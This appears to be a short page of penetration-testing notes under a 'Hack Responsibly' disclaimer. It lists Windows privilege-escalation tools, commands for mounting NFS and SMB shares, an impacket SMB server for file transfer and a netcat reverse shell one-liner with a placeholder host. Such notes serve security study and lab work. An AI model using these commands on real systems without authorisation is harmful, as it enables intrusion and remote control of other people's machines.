| description |
|---|
Sorted Linux notes, need to separate to different pages and reorganize |
{% hint style="success" %} Hack Responsibly.
Always ensure you have explicit permission to access any computer system before using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}
living off the land binaries: LOLBAS
Windows Privilege Escalation Enumeration Script: WinPEAS
Little bit o' everything: PowerSploit
{% embed url="https://resources.infosecinstitute.com/exploiting-nfs-share/" %}
showmount -e <ip>
<list of mounts>
mkdir /tmp/<foldername?
mount -t nfs <ip>:/<mount-folder> /tmp/<foldername>
smbmount //$IP/$share /mnt/remote/ -o username=$user,password=$pass,rw
Where /mnt/remote is the local folder to mount the share to.
Netcat reverse shell (after uploading the binary!): nc64.exe -e cmd <ip port>
5KFB6 tools: https://specterops.io/resources/research-and-development
easy windows shell: unicorn.py trustedsec/unicorn HackTheBox - Arctic
system information: sysinfo
Get user id: getuid
Powershell privilege escalation:
- PowerUp.ps1 from PowerShellEmpire
- Sherlock.ps1
fuzzbunch: exploit tool similar to metasploit
check what updates are installed: type WindowsUpdate.log
net use share from linux [like SimpleHTTPServer for Samba]: impacket-smbserver <sharename> '<dir_to_share>'
If you like this content and would like to see more, please consider buying me a coffee!